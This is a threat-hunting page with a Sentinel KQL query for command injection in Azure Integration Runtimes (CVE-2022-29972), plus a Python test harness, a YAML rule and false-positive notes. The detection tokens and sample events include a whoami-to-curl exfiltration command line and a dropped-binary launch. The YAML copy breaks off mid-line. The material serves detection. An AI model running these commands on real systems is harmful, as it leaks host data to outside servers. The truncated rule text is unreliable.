Adversaries may attempt command injection through a vulnerable third-party driver to gain code execution inside Azure Integration Runtimes, abusing the network access held by the Managed VNet or self-hosted integration runtime (SHIR) worker processes. The hunting query below looks for cmd.exe spawned by those worker processes with command lines typical of post-exploitation activity (for example, reconnaissance output such as whoami piped to curl, or a dropped binary launched via /c start), so SOC teams can proactively hunt for this behavior in Azure Sentinel environments.
KQL Query
let parent_proc_list = dynamic(["diawp.exe", "ReportingServicesService.exe", "RSPortal.exe", "RsPowerBI.exe", "taskexecutor.exe"]);
let cmdline_tokens = dynamic(["| curl ", "/c start ", " whoami 2>&1", "-m 5 ", "--data-binary"]);
(union isfuzzy=true
( DeviceProcessEvents
| where FileName =~ "cmd.exe"
| where InitiatingProcessFileName in~ (parent_proc_list)
| where ProcessCommandLine has_any (cmdline_tokens)
| project-reorder TimeGenerated, DeviceName, DeviceId, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountName
| extend timestamp = TimeGenerated, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName, ProcessCustomEntity = FileName, ProcessIdCustomEntity = tostring(ProcessId), CommandLineCustomEntity = ProcessCommandLine
),
(imProcessCreate
// ASIM ProcessEvent: ActingProcess* is the creating (parent) process and TargetProcess* the created one;
// ParentProcess* is the parent of the acting process. Both names are full paths, so match on the file name.
| where tostring(parse_path(ActingProcessName).Filename) in~ (parent_proc_list)
| where tostring(parse_path(TargetProcessName).Filename) =~ "cmd.exe"
| where CommandLine has_any (cmdline_tokens)
| extend timestamp = TimeGenerated, HostCustomEntity = DvcHostname, AccountCustomEntity = ActorUsername, ProcessCustomEntity = TargetProcessName, ProcessIdCustomEntity = tostring(TargetProcessId), CommandLineCustomEntity = CommandLine
),
(SecurityEvent
| where EventID == 4688
| where Process =~ "cmd.exe" and isnotempty(ParentProcessName)
| extend ParentProcess = tostring(parse_path(ParentProcessName).Filename)
| where ParentProcess in~ (parent_proc_list) and CommandLine has_any (cmdline_tokens)
| project TimeGenerated, Computer, NewProcessName, ParentProcessName, Account, NewProcessId, Type, CommandLine
| extend timestamp = TimeGenerated, HostCustomEntity = Computer, AccountCustomEntity = Account, ProcessCustomEntity = NewProcessName, ProcessIdCustomEntity = tostring(NewProcessId), CommandLineCustomEntity = CommandLine
),
(WindowsEvent
// Cheap pre-filter on the raw EventData before parsing; a hit needs both a listed parent and a token, hence 'and'.
| where EventID == 4688 and EventData has_any (cmdline_tokens) and EventData has_any (parent_proc_list)
| extend CommandLine = tostring(EventData.CommandLine)
| extend NewProcessName = tostring(EventData.NewProcessName)
| extend ParentProcessName = tostring(EventData.ParentProcessName)
// 4688 EventData carries full paths for both processes, so compare the file name rather than the whole string.
| where tostring(parse_path(NewProcessName).Filename) =~ "cmd.exe" and tostring(parse_path(ParentProcessName).Filename) in~ (parent_proc_list)
| where CommandLine has_any (cmdline_tokens)
| extend Account = strcat(tostring(EventData.SubjectDomainName), "\\", tostring(EventData.SubjectUserName))
| extend NewProcessId = tostring(EventData.NewProcessId)
| project TimeGenerated, Computer, NewProcessName, ParentProcessName, Account, NewProcessId, Type, CommandLine
| extend timestamp = TimeGenerated, HostCustomEntity = Computer, AccountCustomEntity = Account, ProcessCustomEntity = NewProcessName, ProcessIdCustomEntity = NewProcessId, CommandLineCustomEntity = CommandLine
)
)
// Entity mapping: split DOMAIN\user and host.dns.domain into the fields Sentinel expects.
| extend NTDomain = tostring(split(AccountCustomEntity, '\\', 0)[0]), Name = tostring(split(AccountCustomEntity, '\\', 1)[0])
| extend HostName = tostring(split(HostCustomEntity, '.', 0)[0]), DnsDomain = tostring(strcat_array(array_slice(split(HostCustomEntity, '.'), 1, -1), '.'))
| extend Account_0_Name = Name
| extend Account_0_NTDomain = NTDomain
| extend Host_0_HostName = HostName
| extend Host_0_DnsDomain = DnsDomain
| extend Process_0_ProcessId = ProcessIdCustomEntity
| extend Process_0_CommandLine = CommandLineCustomEntity
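To check the matching rules offline, the following is an added example (not part of the original page or the Sentinel query repository): a plain-Python re-implementation of the SecurityEvent/WindowsEvent branch logic above (child is cmd.exe, parent file name is in the allow-list, command line carries one of the tokens) plus the entity-mapping splits, run over constructed 4688-style events. Every host name, account, path and command line in the sample data is made up for the illustration; the KQL `has_any` term matching is approximated with a case-insensitive substring test.

```python
# Added example, not part of the original Sentinel hunting query: a plain-Python
# re-implementation of the 4688 matching logic (parent file name in the
# allow-list, child is cmd.exe, command line contains one of the tokens), run
# over constructed Windows process-creation events so the predicates can be
# checked offline. Column names mirror SecurityEvent/WindowsEvent; every event
# below is made up for this illustration.
import ntpath
from typing import Dict, List

PARENT_PROC_LIST = {"diawp.exe", "reportingservicesservice.exe", "rsportal.exe",
                    "rspowerbi.exe", "taskexecutor.exe"}
CMDLINE_TOKENS = ["| curl ", "/c start ", " whoami 2>&1", "-m 5 ", "--data-binary"]


def file_name(path: str) -> str:
    """Equivalent of parse_path(path).Filename: the last path component."""
    return ntpath.basename(path.replace("/", "\\"))


def is_hit(event: Dict[str, str]) -> bool:
    """Apply the three predicates of the SecurityEvent/WindowsEvent branches."""
    if int(event.get("EventID", 0)) != 4688:
        return False
    # 4688 carries full paths; compare on the file name, case-insensitively (=~ / in~)
    if file_name(event.get("NewProcessName", "")).lower() != "cmd.exe":
        return False
    if file_name(event.get("ParentProcessName", "")).lower() not in PARENT_PROC_LIST:
        return False
    # Approximation of KQL has_any: case-insensitive substring search
    # (has_any matches on term boundaries, so it can be slightly stricter).
    cmdline = event.get("CommandLine", "").lower()
    return any(token.lower() in cmdline for token in CMDLINE_TOKENS)


def entities(event: Dict[str, str]) -> Dict[str, str]:
    """Mirror the entity-mapping extends at the end of the query."""
    account_parts = event["Account"].split("\\")
    host_parts = event["Computer"].split(".")
    return {
        "timestamp": event["TimeGenerated"],
        # split(Account, '\\', 0/1): domain before the backslash, user after it;
        # an account without a backslash leaves Name empty, exactly as the KQL does.
        "NTDomain": account_parts[0],
        "Name": account_parts[1] if len(account_parts) > 1 else "",
        "HostName": host_parts[0],
        "DnsDomain": ".".join(host_parts[1:]),
        "ProcessId": event["NewProcessId"],
        "CommandLine": event["CommandLine"],
    }


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the mapped entities for every event that matches the hunt."""
    return [entities(ev) for ev in events if is_hit(ev)]


# Constructed sample events (paths, host and account names are illustrative only).
SAMPLE_EVENTS = [
    {   # expected hit: diawp.exe -> cmd.exe exfiltrating whoami output with curl
        "TimeGenerated": "2022-05-10T08:15:02Z", "EventID": 4688,
        "Computer": "shir01.corp.example.com", "Account": "CORP\\svc_adf",
        "NewProcessId": "0x1a4c",
        "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
        "ParentProcessName": "C:\\Program Files\\Microsoft Integration Runtime\\5.0\\Shared\\diawp.exe",
        "CommandLine": "cmd.exe /c whoami 2>&1 | curl -m 5 --data-binary @- http://198.51.100.7/",
    },
    {   # expected miss: same parent, benign command line (no token)
        "TimeGenerated": "2022-05-10T08:16:10Z", "EventID": 4688,
        "Computer": "shir01.corp.example.com", "Account": "CORP\\svc_adf",
        "NewProcessId": "0x1b00",
        "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
        "ParentProcessName": "C:\\Program Files\\Microsoft Integration Runtime\\5.0\\Shared\\diawp.exe",
        "CommandLine": "cmd.exe /c dir C:\\temp",
    },
    {   # expected miss: suspicious tokens, but the parent is not a runtime worker
        "TimeGenerated": "2022-05-10T09:01:44Z", "EventID": 4688,
        "Computer": "ws17.corp.example.com", "Account": "CORP\\jdoe",
        "NewProcessId": "0x2210",
        "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
        "ParentProcessName": "C:\\Windows\\explorer.exe",
        "CommandLine": "cmd.exe /c whoami 2>&1 | curl --data-binary @- http://198.51.100.7/",
    },
    {   # expected miss: runtime worker spawns powershell.exe, not cmd.exe
        "TimeGenerated": "2022-05-10T09:05:00Z", "EventID": 4688,
        "Computer": "shir02.corp.example.com", "Account": "CORP\\svc_adf",
        "NewProcessId": "0x0f31",
        "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentProcessName": "C:\\Program Files\\Microsoft Integration Runtime\\5.0\\Shared\\taskexecutor.exe",
        "CommandLine": "powershell.exe -c whoami 2>&1 | curl -m 5 --data-binary @- http://198.51.100.7/",
    },
    {   # expected hit: parent name in different case, '/c start ' token, no DNS suffix
        "TimeGenerated": "2022-05-10T09:30:27Z", "EventID": "4688",
        "Computer": "ssrs01", "Account": "NT AUTHORITY\\SYSTEM",
        "NewProcessId": "0x0c8a",
        "NewProcessName": "C:\\Windows\\System32\\CMD.EXE",
        "ParentProcessName": "C:\\Program Files\\Microsoft SQL Server Reporting Services\\SSRS\\Portal\\RSPortal.EXE",
        "CommandLine": "CMD.EXE /c start /b C:\\Users\\Public\\upd.exe",
    },
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Running the script prints the two expected hits and none of the three misses; the second hit also shows why the query compares file names rather than full paths and why the host/account splits must tolerate a host with no DNS suffix.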
id: 2d1a3e86-f1a0-49d0-b88a-55789e1d6660
name: Possible command injection attempts against Azure Integration Runtimes
description: |
  'This hunting query looks for potential command injection attempts via the vulnerable third-party driver against Azure IR with Managed VNet or SHIR processes, as well as post-exploitation activity, based on process execution and command line activity.
  Reference: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29972
  https://msrc-blog.microsoft.com/2022/05/09/vulnerability-mitigated-in-the-third-party-data-connector-used-in-azure-synapse-pipelines-and-azure-data-factory-cve-2022-29972'
requiredDataConnectors:
  - connectorId: MicrosoftDefenderAdvancedThreatProtection
    dataTypes:
      - SecurityAlert (MDATP)
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
  - connectorId: WindowsSecurityEvents
    dataTypes:
      - SecurityEvent
  - connectorId: WindowsForwardedEvents
    dataTypes:
      - WindowsEvent
tactics:
  - Collection
relevantTechniques:
  - T1074.001
query: |
  let parent_proc_list = dynamic(["diawp.exe", "ReportingServicesService.exe", "RSPortal.exe", "RsPowerBI.exe", "taskexecutor.exe"]);
  let cmdline_tokens = dynamic(["| curl ", "/c start ", " whoami 2>&1", "-m 5 ", "--data-binary"]);
  (union isfuzzy=true
  ( DeviceProcessEvents
  | where FileName =~ "cmd.exe"
  | where InitiatingProcessFileName in~ (parent_proc_list)
  | where ProcessCommandLine has_any (cmdline_tokens)
  | project-reorder TimeGenerated, DeviceName, DeviceId, FileName, ProcessCommandLine, InitiatingProcessFileName, AccountName
  | extend timestamp = TimeGenerated, AccountCustomEntity = AccountName, HostCustomEntity = DeviceName, ProcessCustomEntity = FileName, ProcessIdCustomEntity = tostring(ProcessId), CommandLineCustomEntity = ProcessCommandLine
  ),
  (imProcessCreate
  // ASIM ProcessEvent: ActingProcess* is the creating (parent) process and TargetProcess* the created one;
  // ParentProcess* is the parent of the acting process. Both names are full paths, so match on the file name.
  | where tostring(parse_path(ActingProcessName).Filename) in~ (parent_proc_list)
  | where tostring(parse_path(TargetProcessName).Filename) =~ "cmd.exe"
  | where CommandLine has_any (cmdline_tokens)
  | extend timestamp = TimeGenerated, HostCustomEntity = DvcHostname, AccountCustomEntity = ActorUsername, ProcessCustomEntity = TargetProcessName, ProcessIdCustomEntity = tostring(TargetProcessId), CommandLineCustomEntity = CommandLine
  ),
  (SecurityEvent
  | where EventID == 4688
  | where Process =~ "cmd.exe" and isnotempty(ParentProcessName)
  | extend ParentProcess = tostring(parse_path(ParentProcessName).Filename)
  | where ParentProcess in~ (parent_proc_list) and CommandLine has_any (cmdline_tokens)
  | project TimeGenerated, Computer, NewProcessName, ParentProcessName, Account, NewProcessId, Type, CommandLine
  | extend timestamp = TimeGenerated, HostCustomEntity = Computer, AccountCustomEntity = Account, ProcessCustomEntity = NewProcessName, ProcessIdCustomEntity = tostring(NewProcessId), CommandLineCustomEntity = CommandLine
  ),
  (WindowsEvent
  // Cheap pre-filter on the raw EventData before parsing; a hit needs both a listed parent and a token, hence 'and'.
  | where EventID == 4688 and EventData has_any (cmdline_tokens) and EventData has_any (parent_proc_list)
  | extend CommandLine = tostring(EventData.Comma
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Microsoft 365 Defender (MicrosoftThreatProtection) connector; ensure it is enabled |
| SecurityEvent | Windows Security Events connector; event 4688 must be collected with command-line logging enabled ("Include command line in process creation events"), otherwise CommandLine is empty and nothing matches |
| WindowsEvent | Windows Forwarded Events connector; same 4688 and command-line auditing requirement |
| imProcessCreate | ASIM process-creation parser (a function, not a table); deploy the ASIM parsers in the workspace so the name resolves, otherwise union isfuzzy silently drops this branch |
Scenario: Scheduled Job for System Maintenance
Description: A legitimate scheduled job runs a script that includes command-line arguments for system maintenance, which may be misinterpreted as command injection.
Filter/Exclusion: Exclude processes associated with schtasks.exe or Task Scheduler and filter out commands that match known maintenance scripts (e.g., systeminfo, diskperf, netstat).
Scenario: Admin Task Using PowerShell for Configuration
Description: An admin uses PowerShell to configure Azure Integration Runtime settings, which may include pipeline commands that resemble injection patterns.
Filter/Exclusion: Exclude PowerShell scripts executed by powershell.exe with known admin tools (e.g., Set-AzIntegrationRuntime, Get-AzIntegrationRuntime) and filter by user context (e.g., domain\admin_user).
Scenario: Log Collection via PowerShell Cmdlets
Description: A legitimate log collection script uses Invoke-Command or Write-EventLog to gather logs, which may trigger the rule due to command-like syntax.
Filter/Exclusion: Exclude processes with logcollection.exe, logparser.exe, or scripts that use Write-EventLog or Get-EventLog.
Scenario: Azure DevOps Pipeline Execution
Description: A CI/CD pipeline runs a script that includes command-line arguments for deploying Azure resources, which may be flagged as command injection.
Filter/Exclusion: Exclude processes associated with azure-pipelines.exe or azure-devops-services, and filter by known pipeline commands (e.g., az pipeline, az deployment).
Scenario: Network Configuration via Command Prompt
Description: A network admin uses netsh or ipconfig to configure network settings, which may contain command-like strings that trigger the rule.